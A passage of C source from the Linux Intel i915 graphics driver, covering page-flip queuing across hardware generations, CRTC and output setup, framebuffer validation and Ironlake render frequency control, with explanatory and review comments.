		e->event.sequence = drm_vblank_count_and_time(dev, intel_crtc->pipe, &tvbl);

		/* Called before vblank count and timestamps have
		 * been updated for the vblank interval of flip
		 * completion? Need to increment vblank count and
		 * add one videorefresh duration to returned timestamp
		 * to account for this. We assume this happened if we
		 * get called over 0.9 frame durations after the last
		 * timestamped vblank.
		 *
		 * This calculation can not be used with vrefresh rates
		 * below 5Hz (10Hz to be on the safe side) without
		 * promoting to 64 integers.
		 */
		if (10 * (timeval_to_ns(&tnow) - timeval_to_ns(&tvbl)) >
		    9 * crtc->framedur_ns) {
			e->event.sequence++;
			tvbl = ns_to_timeval(timeval_to_ns(&tvbl) +
					     crtc->framedur_ns);
		}

		e->event.tv_sec = tvbl.tv_sec;
		e->event.tv_usec = tvbl.tv_usec;

		list_add_tail(&e->base.link,
			      &e->base.file_priv->event_list);
		wake_up_interruptible(&e->base.file_priv->event_wait);
	}

	drm_vblank_put(dev, intel_crtc->pipe);

	spin_unlock_irqrestore(&dev->event_lock, flags);

	obj = work->old_fb_obj;

	/* Clear this plane's pending-flip bit; wake anyone waiting for all
	 * flips on the object to drain. */
	atomic_clear_mask(1 << intel_crtc->plane,
			  &obj->pending_flip.counter);
	if (atomic_read(&obj->pending_flip) == 0)
		wake_up(&dev_priv->pending_flip_queue);

	schedule_work(&work->work);

	trace_i915_flip_complete(intel_crtc->plane, work->pending_flip_obj);
}
/* Flip-complete entry point for interrupts indexed by pipe. */
void intel_finish_page_flip(struct drm_device *dev, int pipe)
{
	drm_i915_private_t *dev_priv = dev->dev_private;
	struct drm_crtc *crtc = dev_priv->pipe_to_crtc_mapping[pipe];

	do_intel_finish_page_flip(dev, crtc);
}
/* Flip-complete entry point for interrupts indexed by plane. */
void intel_finish_page_flip_plane(struct drm_device *dev, int plane)
{
	drm_i915_private_t *dev_priv = dev->dev_private;
	struct drm_crtc *crtc = dev_priv->plane_to_crtc_mapping[plane];

	do_intel_finish_page_flip(dev, crtc);
}
/* Arm a queued flip for completion: marks the pending unpin work so the
 * next finish_page_flip for this plane will actually complete it.
 * Seeing the counter go above 1 means we were called twice for the same
 * flip, which is flagged as an error. */
void intel_prepare_page_flip(struct drm_device *dev, int plane)
{
	drm_i915_private_t *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc =
		to_intel_crtc(dev_priv->plane_to_crtc_mapping[plane]);
	unsigned long flags;

	spin_lock_irqsave(&dev->event_lock, flags);
	if (intel_crtc->unpin_work) {
		if ((++intel_crtc->unpin_work->pending) > 1)
			DRM_ERROR("Prepared flip multiple times\n");
	} else {
		DRM_DEBUG_DRIVER("preparing flip with no unpin work?\n");
	}
	spin_unlock_irqrestore(&dev->event_lock, flags);
}
/* Queue a page flip on gen2 hardware via the legacy (LP) ring.
 * Pins and fences the new object, then emits a MI_WAIT_FOR_EVENT to
 * serialise against any previous flip, followed by the MI_DISPLAY_FLIP
 * packet.  Returns 0 on success or a negative error code. */
static int intel_gen2_queue_flip(struct drm_device *dev,
				 struct drm_crtc *crtc,
				 struct drm_framebuffer *fb,
				 struct drm_i915_gem_object *obj)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	unsigned long offset;
	u32 flip_mask;
	int ret;

	ret = intel_pin_and_fence_fb_obj(dev, obj, LP_RING(dev_priv));
	if (ret)
		goto out;

	/* Offset into the new buffer for cases of shared fbs between CRTCs */
	offset = crtc->y * fb->pitch + crtc->x * fb->bits_per_pixel/8;

	ret = BEGIN_LP_RING(6);
	if (ret)
		goto out;

	/* Can't queue multiple flips, so wait for the previous
	 * one to finish before executing the next.
	 */
	if (intel_crtc->plane)
		flip_mask = MI_WAIT_FOR_PLANE_B_FLIP;
	else
		flip_mask = MI_WAIT_FOR_PLANE_A_FLIP;
	OUT_RING(MI_WAIT_FOR_EVENT | flip_mask);
	OUT_RING(MI_NOOP);
	OUT_RING(MI_DISPLAY_FLIP |
		 MI_DISPLAY_FLIP_PLANE(intel_crtc->plane));
	OUT_RING(fb->pitch);
	OUT_RING(obj->gtt_offset + offset);
	OUT_RING(MI_NOOP);
	ADVANCE_LP_RING();
out:
	return ret;
}
/* Queue a page flip on gen3 hardware.  Same structure as the gen2 path
 * but emits the i915 variant of the flip opcode (MI_DISPLAY_FLIP_I915).
 * Returns 0 on success or a negative error code. */
static int intel_gen3_queue_flip(struct drm_device *dev,
				 struct drm_crtc *crtc,
				 struct drm_framebuffer *fb,
				 struct drm_i915_gem_object *obj)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	unsigned long offset;
	u32 flip_mask;
	int ret;

	ret = intel_pin_and_fence_fb_obj(dev, obj, LP_RING(dev_priv));
	if (ret)
		goto out;

	/* Offset into the new buffer for cases of shared fbs between CRTCs */
	offset = crtc->y * fb->pitch + crtc->x * fb->bits_per_pixel/8;

	ret = BEGIN_LP_RING(6);
	if (ret)
		goto out;

	/* Serialise against any previous flip on the same plane. */
	if (intel_crtc->plane)
		flip_mask = MI_WAIT_FOR_PLANE_B_FLIP;
	else
		flip_mask = MI_WAIT_FOR_PLANE_A_FLIP;
	OUT_RING(MI_WAIT_FOR_EVENT | flip_mask);
	OUT_RING(MI_NOOP);
	OUT_RING(MI_DISPLAY_FLIP_I915 |
		 MI_DISPLAY_FLIP_PLANE(intel_crtc->plane));
	OUT_RING(fb->pitch);
	OUT_RING(obj->gtt_offset + offset);
	OUT_RING(MI_NOOP);
	ADVANCE_LP_RING();
out:
	return ret;
}
/* Queue a page flip on gen4 (i965+) hardware.  No wait packet is needed;
 * the display registers carry the offsets, so only the base address (and
 * tiling bit) is reprogrammed.  Returns 0 or a negative error code. */
static int intel_gen4_queue_flip(struct drm_device *dev,
				 struct drm_crtc *crtc,
				 struct drm_framebuffer *fb,
				 struct drm_i915_gem_object *obj)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	uint32_t pf, pipesrc;
	int ret;

	ret = intel_pin_and_fence_fb_obj(dev, obj, LP_RING(dev_priv));
	if (ret)
		goto out;

	ret = BEGIN_LP_RING(4);
	if (ret)
		goto out;

	/* i965+ uses the linear or tiled offsets from the
	 * Display Registers (which do not change across a page-flip)
	 * so we need only reprogram the base address.
	 */
	OUT_RING(MI_DISPLAY_FLIP |
		 MI_DISPLAY_FLIP_PLANE(intel_crtc->plane));
	OUT_RING(fb->pitch);
	OUT_RING(obj->gtt_offset | obj->tiling_mode);

	/* XXX Enabling the panel-fitter across page-flip is so far
	 * untested on non-native modes, so ignore it for now.
	 * pf = I915_READ(pipe == 0 ? PFA_CTL_1 : PFB_CTL_1) & PF_ENABLE;
	 */
	pf = 0;
	pipesrc = I915_READ(PIPESRC(intel_crtc->pipe)) & 0x0fff0fff;
	OUT_RING(pf | pipesrc);
	ADVANCE_LP_RING();
out:
	return ret;
}
/* Queue a page flip on gen6 hardware.  Like gen4 but the tiling mode is
 * packed into the pitch dword and the live panel-fitter state is carried
 * across the flip.  Returns 0 or a negative error code. */
static int intel_gen6_queue_flip(struct drm_device *dev,
				 struct drm_crtc *crtc,
				 struct drm_framebuffer *fb,
				 struct drm_i915_gem_object *obj)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	uint32_t pf, pipesrc;
	int ret;

	ret = intel_pin_and_fence_fb_obj(dev, obj, LP_RING(dev_priv));
	if (ret)
		goto out;

	ret = BEGIN_LP_RING(4);
	if (ret)
		goto out;

	OUT_RING(MI_DISPLAY_FLIP |
		 MI_DISPLAY_FLIP_PLANE(intel_crtc->plane));
	OUT_RING(fb->pitch | obj->tiling_mode);
	OUT_RING(obj->gtt_offset);

	/* Preserve the current panel-fitter enable across the flip. */
	pf = I915_READ(PF_CTL(intel_crtc->pipe)) & PF_ENABLE;
	pipesrc = I915_READ(PIPESRC(intel_crtc->pipe)) & 0x0fff0fff;
	OUT_RING(pf | pipesrc);
	ADVANCE_LP_RING();
out:
	return ret;
}
/*
 * On gen7 we currently use the blit ring because (in early silicon at least)
 * the render ring doesn't give us interrpts for page flip completion, which
 * means clients will hang after the first flip is queued. Fortunately the
 * blit ring generates interrupts properly, so use it instead.
 */
static int intel_gen7_queue_flip(struct drm_device *dev,
				 struct drm_crtc *crtc,
				 struct drm_framebuffer *fb,
				 struct drm_i915_gem_object *obj)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	struct intel_ring_buffer *ring = &dev_priv->ring[BCS];
	int ret;

	ret = intel_pin_and_fence_fb_obj(dev, obj, ring);
	if (ret)
		goto out;

	ret = intel_ring_begin(ring, 4);
	if (ret)
		goto out;

	/* NOTE(review): the plane is encoded with a raw "<< 19" rather
	 * than MI_DISPLAY_FLIP_PLANE() as on earlier gens -- presumably
	 * the gen7 plane-select field; confirm against the gen7 PRM. */
	intel_ring_emit(ring, MI_DISPLAY_FLIP_I915 | (intel_crtc->plane << 19));
	intel_ring_emit(ring, (fb->pitch | obj->tiling_mode));
	intel_ring_emit(ring, (obj->gtt_offset));
	intel_ring_emit(ring, (MI_NOOP));
	intel_ring_advance(ring);
out:
	return ret;
}
/* Fallback queue_flip hook for platforms with no flip implementation:
 * always fails with -ENODEV. */
static int intel_default_queue_flip(struct drm_device *dev,
				    struct drm_crtc *crtc,
				    struct drm_framebuffer *fb,
				    struct drm_i915_gem_object *obj)
{
	return -ENODEV;
}
/* drm_crtc_funcs.page_flip implementation: queue an asynchronous flip of
 * @crtc to @fb, delivering @event on completion.  Allocates the unpin
 * work, takes references on both old and new objects, grabs a vblank
 * reference, and hands off to the per-generation queue_flip hook.
 * Returns 0 on success, -EBUSY if a flip is already pending, or a
 * negative error code (with all state rolled back). */
static int intel_crtc_page_flip(struct drm_crtc *crtc,
				struct drm_framebuffer *fb,
				struct drm_pending_vblank_event *event)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_framebuffer *intel_fb;
	struct drm_i915_gem_object *obj;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	struct intel_unpin_work *work;
	unsigned long flags;
	int ret;

	work = kzalloc(sizeof *work, GFP_KERNEL);
	if (work == NULL)
		return -ENOMEM;

	work->event = event;
	work->dev = crtc->dev;
	intel_fb = to_intel_framebuffer(crtc->fb);
	work->old_fb_obj = intel_fb->obj;
	INIT_WORK(&work->work, intel_unpin_work_fn);

	/* We borrow the event spin lock for protecting unpin_work */
	spin_lock_irqsave(&dev->event_lock, flags);
	if (intel_crtc->unpin_work) {
		/* Only one flip may be outstanding per CRTC. */
		spin_unlock_irqrestore(&dev->event_lock, flags);
		kfree(work);

		DRM_DEBUG_DRIVER("flip queue: crtc already busy\n");
		return -EBUSY;
	}
	intel_crtc->unpin_work = work;
	spin_unlock_irqrestore(&dev->event_lock, flags);

	intel_fb = to_intel_framebuffer(fb);
	obj = intel_fb->obj;

	mutex_lock(&dev->struct_mutex);

	/* Reference the objects for the scheduled work. */
	drm_gem_object_reference(&work->old_fb_obj->base);
	drm_gem_object_reference(&obj->base);

	crtc->fb = fb;

	ret = drm_vblank_get(dev, intel_crtc->pipe);
	if (ret)
		goto cleanup_objs;

	work->pending_flip_obj = obj;
	work->enable_stall_check = true;

	/* Block clients from rendering to the new back buffer until
	 * the flip occurs and the object is no longer visible.
	 */
	atomic_add(1 << intel_crtc->plane, &work->old_fb_obj->pending_flip);

	ret = dev_priv->display.queue_flip(dev, crtc, fb, obj);
	if (ret)
		goto cleanup_pending;

	intel_disable_fbc(dev);
	mutex_unlock(&dev->struct_mutex);

	trace_i915_flip_request(intel_crtc->plane, obj);

	return 0;

cleanup_pending:
	atomic_sub(1 << intel_crtc->plane, &work->old_fb_obj->pending_flip);
cleanup_objs:
	drm_gem_object_unreference(&work->old_fb_obj->base);
	drm_gem_object_unreference(&obj->base);
	mutex_unlock(&dev->struct_mutex);

	spin_lock_irqsave(&dev->event_lock, flags);
	intel_crtc->unpin_work = NULL;
	spin_unlock_irqrestore(&dev->event_lock, flags);

	kfree(work);

	return ret;
}
/* Clean up conflicting plane/pipe routing left behind by the BIOS or
 * bootloader on pre-PCH hardware: if the given plane is enabled but
 * scanning out from the *other* pipe, disable that plane and pipe so our
 * own modeset teardown ordering stays correct. */
static void intel_sanitize_modesetting(struct drm_device *dev,
				       int pipe, int plane)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 reg, val;

	if (HAS_PCH_SPLIT(dev))
		return;

	/* Who knows what state these registers were left in by the BIOS or
	 * grub?
	 *
	 * If we leave the registers in a conflicting state (e.g. with the
	 * display plane reading from the other pipe than the one we intend
	 * to use) then when we attempt to teardown the active mode, we will
	 * not disable the pipes and planes in the correct order -- leaving
	 * a plane reading from a disabled pipe and possibly leading to
	 * undefined behaviour.
	 */

	reg = DSPCNTR(plane);
	val = I915_READ(reg);

	if ((val & DISPLAY_PLANE_ENABLE) == 0)
		return;
	/* NOTE(review): the "!!" collapses the masked field to 0/1 before
	 * comparing against the pipe number -- assumes two pipes and a
	 * pipe-select encoding where non-zero means pipe B; confirm the
	 * DISPPLANE_SEL_PIPE_MASK encoding. */
	if (!!(val & DISPPLANE_SEL_PIPE_MASK) == pipe)
		return;

	/* This display plane is active and attached to the other CPU pipe. */
	pipe = !pipe;

	/* Disable the plane and wait for it to stop reading from the pipe. */
	intel_disable_plane(dev_priv, plane, pipe);
	intel_disable_pipe(dev_priv, pipe);
}
/* drm_crtc_funcs.reset hook: forget cached DPMS state and sanitize any
 * conflicting BIOS plane/pipe routing before the first modeset. */
static void intel_crtc_reset(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);

	/* Reset flags back to the 'unknown' status so that they
	 * will be correctly set on the initial modeset.
	 */
	intel_crtc->dpms_mode = -1;

	/* We need to fix up any BIOS configuration that conflicts with
	 * our expectations.
	 */
	intel_sanitize_modesetting(dev, intel_crtc->pipe, intel_crtc->plane);
}
/* CRTC helper vtable.  Deliberately NOT const: .prepare and .commit are
 * filled in per-platform (ironlake vs i9xx) in intel_crtc_init(). */
static struct drm_crtc_helper_funcs intel_helper_funcs = {
	.dpms = intel_crtc_dpms,
	.mode_fixup = intel_crtc_mode_fixup,
	.mode_set = intel_crtc_mode_set,
	.mode_set_base = intel_pipe_set_base,
	.mode_set_base_atomic = intel_pipe_set_base_atomic,
	.load_lut = intel_crtc_load_lut,
	.disable = intel_crtc_disable,
};
/* Core CRTC vtable handed to drm_crtc_init(). */
static const struct drm_crtc_funcs intel_crtc_funcs = {
	.reset = intel_crtc_reset,
	.cursor_set = intel_crtc_cursor_set,
	.cursor_move = intel_crtc_cursor_move,
	.gamma_set = intel_crtc_gamma_set,
	.set_config = drm_crtc_helper_set_config,
	.destroy = intel_crtc_destroy,
	.page_flip = intel_crtc_page_flip,
};
/* Allocate and register one intel_crtc for the given pipe: identity
 * gamma LUT, pipe<->plane mapping (swapped on mobile gen3 for FBC),
 * per-platform helper hooks, and the idle-downclock timer.
 * Silently returns on allocation failure. */
static void intel_crtc_init(struct drm_device *dev, int pipe)
{
	drm_i915_private_t *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc;
	int i;

	/* Trailing storage for the per-CRTC connector pointer array. */
	intel_crtc = kzalloc(sizeof(struct intel_crtc) + (INTELFB_CONN_LIMIT * sizeof(struct drm_connector *)), GFP_KERNEL);
	if (intel_crtc == NULL)
		return;

	drm_crtc_init(dev, &intel_crtc->base, &intel_crtc_funcs);

	/* Start with an identity gamma ramp. */
	drm_mode_crtc_set_gamma_size(&intel_crtc->base, 256);
	for (i = 0; i < 256; i++) {
		intel_crtc->lut_r[i] = i;
		intel_crtc->lut_g[i] = i;
		intel_crtc->lut_b[i] = i;
	}

	/* Swap pipes & planes for FBC on pre-965 */
	intel_crtc->pipe = pipe;
	intel_crtc->plane = pipe;
	if (IS_MOBILE(dev) && IS_GEN3(dev)) {
		DRM_DEBUG_KMS("swapping pipes & planes for FBC\n");
		intel_crtc->plane = !pipe;
	}

	BUG_ON(pipe >= ARRAY_SIZE(dev_priv->plane_to_crtc_mapping) ||
	       dev_priv->plane_to_crtc_mapping[intel_crtc->plane] != NULL);
	dev_priv->plane_to_crtc_mapping[intel_crtc->plane] = &intel_crtc->base;
	dev_priv->pipe_to_crtc_mapping[intel_crtc->pipe] = &intel_crtc->base;

	intel_crtc_reset(&intel_crtc->base);
	intel_crtc->active = true; /* force the pipe off on setup_init_config */
	intel_crtc->bpp = 24; /* default for pre-Ironlake */

	/* Patch in the per-platform prepare/commit helpers. */
	if (HAS_PCH_SPLIT(dev)) {
		intel_helper_funcs.prepare = ironlake_crtc_prepare;
		intel_helper_funcs.commit = ironlake_crtc_commit;
	} else {
		intel_helper_funcs.prepare = i9xx_crtc_prepare;
		intel_helper_funcs.commit = i9xx_crtc_commit;
	}
	drm_crtc_helper_add(&intel_crtc->base, &intel_helper_funcs);

	intel_crtc->busy = false;

	setup_timer(&intel_crtc->idle_timer, intel_crtc_idle_timer,
		    (unsigned long)intel_crtc);
}
/* DRM_I915_GET_PIPE_FROM_CRTC_ID ioctl: translate a userspace CRTC id
 * into the hardware pipe index.  Returns 0 on success, -EINVAL if the
 * driver is uninitialised or the id does not name a CRTC. */
int intel_get_pipe_from_crtc_id(struct drm_device *dev, void *data,
				struct drm_file *file)
{
	drm_i915_private_t *dev_priv = dev->dev_private;
	struct drm_i915_get_pipe_from_crtc_id *pipe_from_crtc_id = data;
	struct drm_mode_object *drmmode_obj;
	struct intel_crtc *crtc;

	if (!dev_priv) {
		DRM_ERROR("called with no initialization\n");
		return -EINVAL;
	}

	drmmode_obj = drm_mode_object_find(dev, pipe_from_crtc_id->crtc_id,
			DRM_MODE_OBJECT_CRTC);

	if (!drmmode_obj) {
		DRM_ERROR("no such CRTC id\n");
		return -EINVAL;
	}

	crtc = to_intel_crtc(obj_to_crtc(drmmode_obj));
	pipe_from_crtc_id->pipe = crtc->pipe;

	return 0;
}
/* Build the possible_clones bitmask for an encoder type: bit i is set
 * when the i'th encoder in the mode_config list can be cloned with any
 * encoder whose type is in @type_mask. */
static int intel_encoder_clones(struct drm_device *dev, int type_mask)
{
	struct intel_encoder *candidate;
	int mask = 0;
	int bit = 0;

	list_for_each_entry(candidate, &dev->mode_config.encoder_list,
			    base.head) {
		if (candidate->clone_mask & type_mask)
			mask |= 1 << bit;
		bit++;
	}

	return mask;
}
/* Report whether eDP on port A is present and usable: mobile parts only,
 * the DP_A strap must be detected, and on gen5 the fuse must not disable
 * it.  Evaluation order (and thus register access order) matches the
 * original guard-clause form via short-circuiting. */
static bool has_edp_a(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;

	return IS_MOBILE(dev) &&
	       (I915_READ(DP_A) & DP_DETECTED) != 0 &&
	       !(IS_GEN5(dev) &&
		 (I915_READ(ILK_DISPLAY_CHICKEN_FUSES) & ILK_eDP_A_DISABLE));
}
/* Probe and register every display output (LVDS, eDP, CRT, SDVO, HDMI,
 * DP, DVO, TV) appropriate for this platform, then compute each
 * encoder's possible_crtcs/possible_clones and disable everything for a
 * clean KMS start.  Probe order matters: shared pins (e.g. SDVO/HDMI/DP
 * multiplexing) are tried in priority order. */
static void intel_setup_outputs(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_encoder *encoder;
	bool dpd_is_edp = false;
	bool has_lvds = false;

	if (IS_MOBILE(dev) && !IS_I830(dev))
		has_lvds = intel_lvds_init(dev);
	if (!has_lvds && !HAS_PCH_SPLIT(dev)) {
		/* disable the panel fitter on everything but LVDS */
		I915_WRITE(PFIT_CONTROL, 0);
	}

	if (HAS_PCH_SPLIT(dev)) {
		dpd_is_edp = intel_dpd_is_edp(dev);

		if (has_edp_a(dev))
			intel_dp_init(dev, DP_A);

		/* Register eDP on port D before CRT so it wins probing. */
		if (dpd_is_edp && (I915_READ(PCH_DP_D) & DP_DETECTED))
			intel_dp_init(dev, PCH_DP_D);
	}

	intel_crt_init(dev);

	if (HAS_PCH_SPLIT(dev)) {
		int found;

		if (I915_READ(HDMIB) & PORT_DETECTED) {
			/* PCH SDVOB multiplex with HDMIB */
			found = intel_sdvo_init(dev, PCH_SDVOB);
			if (!found)
				intel_hdmi_init(dev, HDMIB);
			if (!found && (I915_READ(PCH_DP_B) & DP_DETECTED))
				intel_dp_init(dev, PCH_DP_B);
		}

		if (I915_READ(HDMIC) & PORT_DETECTED)
			intel_hdmi_init(dev, HDMIC);

		if (I915_READ(HDMID) & PORT_DETECTED)
			intel_hdmi_init(dev, HDMID);

		if (I915_READ(PCH_DP_C) & DP_DETECTED)
			intel_dp_init(dev, PCH_DP_C);

		/* Port D as regular DP only if it wasn't claimed as eDP. */
		if (!dpd_is_edp && (I915_READ(PCH_DP_D) & DP_DETECTED))
			intel_dp_init(dev, PCH_DP_D);

	} else if (SUPPORTS_DIGITAL_OUTPUTS(dev)) {
		bool found = false;

		if (I915_READ(SDVOB) & SDVO_DETECTED) {
			DRM_DEBUG_KMS("probing SDVOB\n");
			found = intel_sdvo_init(dev, SDVOB);
			if (!found && SUPPORTS_INTEGRATED_HDMI(dev)) {
				DRM_DEBUG_KMS("probing HDMI on SDVOB\n");
				intel_hdmi_init(dev, SDVOB);
			}

			if (!found && SUPPORTS_INTEGRATED_DP(dev)) {
				DRM_DEBUG_KMS("probing DP_B\n");
				intel_dp_init(dev, DP_B);
			}
		}

		/* Before G4X SDVOC doesn't have its own detect register */

		/* NOTE(review): SDVOB's detect bit is deliberately reused
		 * to gate the SDVOC probe here (see comment above); 'found'
		 * is overwritten, so the SDVOB result no longer matters
		 * past this point. */
		if (I915_READ(SDVOB) & SDVO_DETECTED) {
			DRM_DEBUG_KMS("probing SDVOC\n");
			found = intel_sdvo_init(dev, SDVOC);
		}

		if (!found && (I915_READ(SDVOC) & SDVO_DETECTED)) {

			if (SUPPORTS_INTEGRATED_HDMI(dev)) {
				DRM_DEBUG_KMS("probing HDMI on SDVOC\n");
				intel_hdmi_init(dev, SDVOC);
			}
			if (SUPPORTS_INTEGRATED_DP(dev)) {
				DRM_DEBUG_KMS("probing DP_C\n");
				intel_dp_init(dev, DP_C);
			}
		}

		if (SUPPORTS_INTEGRATED_DP(dev) &&
		    (I915_READ(DP_D) & DP_DETECTED)) {
			DRM_DEBUG_KMS("probing DP_D\n");
			intel_dp_init(dev, DP_D);
		}
	} else if (IS_GEN2(dev))
		intel_dvo_init(dev);

	if (SUPPORTS_TV(dev))
		intel_tv_init(dev);

	list_for_each_entry(encoder, &dev->mode_config.encoder_list, base.head) {
		encoder->base.possible_crtcs = encoder->crtc_mask;
		encoder->base.possible_clones =
			intel_encoder_clones(dev, encoder->clone_mask);
	}

	/* disable all the possible outputs/crtcs before entering KMS mode */
	drm_helper_disable_unused_functions(dev);
}
/* Framebuffer destructor: release the DRM fb, drop our reference on the
 * backing GEM object, and free the wrapper. */
static void intel_user_framebuffer_destroy(struct drm_framebuffer *fb)
{
	struct intel_framebuffer *intel_fb = to_intel_framebuffer(fb);

	drm_framebuffer_cleanup(fb);
	drm_gem_object_unreference_unlocked(&intel_fb->obj->base);

	kfree(intel_fb);
}
/* Framebuffer create_handle hook: hand userspace a GEM handle for the
 * framebuffer's backing object. */
static int intel_user_framebuffer_create_handle(struct drm_framebuffer *fb,
						struct drm_file *file,
						unsigned int *handle)
{
	struct intel_framebuffer *intel_fb = to_intel_framebuffer(fb);
	struct drm_i915_gem_object *obj = intel_fb->obj;

	return drm_gem_handle_create(file, &obj->base, handle);
}
/* Framebuffer vtable handed to drm_framebuffer_init(). */
static const struct drm_framebuffer_funcs intel_fb_funcs = {
	.destroy = intel_user_framebuffer_destroy,
	.create_handle = intel_user_framebuffer_create_handle,
};
/* Validate @mode_cmd/@obj against hardware framebuffer constraints and
 * initialise @intel_fb.  Rejects Y tiling, pitches not 64-byte aligned,
 * and unsupported bpp/depth combinations.  Returns 0 on success or a
 * negative error code; on success @intel_fb takes note of @obj (no extra
 * reference is taken here). */
int intel_framebuffer_init(struct drm_device *dev,
			   struct intel_framebuffer *intel_fb,
			   struct drm_mode_fb_cmd *mode_cmd,
			   struct drm_i915_gem_object *obj)
{
	int ret;

	/* Display hardware cannot scan out Y-tiled surfaces. */
	if (obj->tiling_mode == I915_TILING_Y)
		return -EINVAL;

	/* Pitch must be a multiple of 64 bytes. */
	if (mode_cmd->pitch & 63)
		return -EINVAL;

	switch (mode_cmd->bpp) {
	case 8:
	case 16:
		/* Only pre-ILK can handle 5:5:5, so reject depth 15 once
		 * the PCH split (Ironlake+) is present.  The previous
		 * check was inverted and refused it on exactly the
		 * hardware that supports it. */
		if (mode_cmd->depth == 15 && HAS_PCH_SPLIT(dev))
			return -EINVAL;
		break;
	case 24:
	case 32:
		break;
	default:
		return -EINVAL;
	}

	ret = drm_framebuffer_init(dev, &intel_fb->base, &intel_fb_funcs);
	if (ret) {
		DRM_ERROR("framebuffer init failed %d\n", ret);
		return ret;
	}

	drm_helper_mode_fill_fb_struct(&intel_fb->base, mode_cmd);
	intel_fb->obj = obj;
	return 0;
}
/* mode_config fb_create hook: look up the userspace GEM handle and build
 * an intel framebuffer around it.  Returns ERR_PTR(-ENOENT) if the
 * handle does not resolve. */
static struct drm_framebuffer *
intel_user_framebuffer_create(struct drm_device *dev,
			      struct drm_file *filp,
			      struct drm_mode_fb_cmd *mode_cmd)
{
	struct drm_i915_gem_object *obj;

	obj = to_intel_bo(drm_gem_object_lookup(dev, filp, mode_cmd->handle));
	/* NOTE(review): this NULL check relies on 'base' being the first
	 * member of drm_i915_gem_object so that to_intel_bo(NULL) keeps
	 * &obj->base == NULL -- confirm the struct layout. */
	if (&obj->base == NULL)
		return ERR_PTR(-ENOENT);

	return intel_framebuffer_create(dev, mode_cmd, obj);
}
/* Top-level mode_config vtable: userspace fb creation and hotplug poll. */
static const struct drm_mode_config_funcs intel_mode_funcs = {
	.fb_create = intel_user_framebuffer_create,
	.output_poll_changed = intel_fb_output_poll_changed,
};
/* Allocate, pin, and GTT-map a 4KiB context page (e.g. the power
 * context used for RC6).  Must be called with dev->struct_mutex held;
 * the lock is held on return on ALL paths.  Returns the pinned object,
 * or NULL on failure.
 *
 * Fix: the old error path dropped dev->struct_mutex even though the
 * function requires (and asserts) that the caller holds it and keeps it
 * held on success -- callers would then unlock an already-unlocked
 * mutex.  The stray mutex_unlock is removed so lock ownership is
 * symmetric. */
static struct drm_i915_gem_object *
intel_alloc_context_page(struct drm_device *dev)
{
	struct drm_i915_gem_object *ctx;
	int ret;

	WARN_ON(!mutex_is_locked(&dev->struct_mutex));

	ctx = i915_gem_alloc_object(dev, 4096);
	if (!ctx) {
		DRM_DEBUG("failed to alloc power context, RC6 disabled\n");
		return NULL;
	}

	ret = i915_gem_object_pin(ctx, 4096, true);
	if (ret) {
		DRM_ERROR("failed to pin power context: %d\n", ret);
		goto err_unref;
	}

	ret = i915_gem_object_set_to_gtt_domain(ctx, 1);
	if (ret) {
		DRM_ERROR("failed to set-domain on power context: %d\n", ret);
		goto err_unpin;
	}

	return ctx;

err_unpin:
	i915_gem_object_unpin(ctx);
err_unref:
	drm_gem_object_unreference(&ctx->base);
	return NULL;
}
/* Request a new render frequency @val via the MEMSWCTL mailbox.
 * Returns false without acting if the previous command is still
 * in flight, true once the new request has been issued. */
bool ironlake_set_drps(struct drm_device *dev, u8 val)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u16 rgvswctl;

	rgvswctl = I915_READ16(MEMSWCTL);
	if (rgvswctl & MEMCTL_CMD_STS) {
		DRM_DEBUG("gpu busy, RCS change rejected\n");
		return false; /* still busy with another command */
	}

	/* Issue the frequency-change command... */
	rgvswctl = (MEMCTL_CMD_CHFREQ << MEMCTL_CMD_SHIFT) |
		(val << MEMCTL_FREQ_SHIFT) | MEMCTL_SFCAVM;
	I915_WRITE16(MEMSWCTL, rgvswctl);
	POSTING_READ16(MEMSWCTL);

	/* ...then set the status bit to trigger it. */
	rgvswctl |= MEMCTL_CMD_STS;
	I915_WRITE16(MEMSWCTL, rgvswctl);

	return true;
}
/* Enable Ironlake dynamic render P-state switching (DRPS): program the
 * evaluation intervals and thresholds, derive fmax/fmin/fstart from the
 * fuses in MEMMODECTL, enable software mode, and drop to the starting
 * frequency.  Also snapshots the counters used by the IPS accounting. */
void ironlake_enable_drps(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 rgvmodectl = I915_READ(MEMMODECTL);
	u8 fmax, fmin, fstart, vstart;

	/* Enable temp reporting */
	I915_WRITE16(PMMISC, I915_READ(PMMISC) | MCPPCE_EN);
	I915_WRITE16(TSC1, I915_READ(TSC1) | TSE);

	/* 100ms RC evaluation intervals */
	I915_WRITE(RCUPEI, 100000);
	I915_WRITE(RCDNEI, 100000);

	/* Set max/min thresholds to 90ms and 80ms respectively */
	I915_WRITE(RCBMAXAVG, 90000);
	I915_WRITE(RCBMINAVG, 80000);

	I915_WRITE(MEMIHYST, 1);

	/* Set up min, max, and cur for interrupt handling */
	fmax = (rgvmodectl & MEMMODE_FMAX_MASK) >> MEMMODE_FMAX_SHIFT;
	fmin = (rgvmodectl & MEMMODE_FMIN_MASK);
	fstart = (rgvmodectl & MEMMODE_FSTART_MASK) >>
		MEMMODE_FSTART_SHIFT;

	/* Voltage corresponding to the start frequency. */
	vstart = (I915_READ(PXVFREQ_BASE + (fstart * 4)) & PXVFREQ_PX_MASK) >>
		PXVFREQ_PX_SHIFT;

	dev_priv->fmax = fmax; /* IPS callback will increase this */
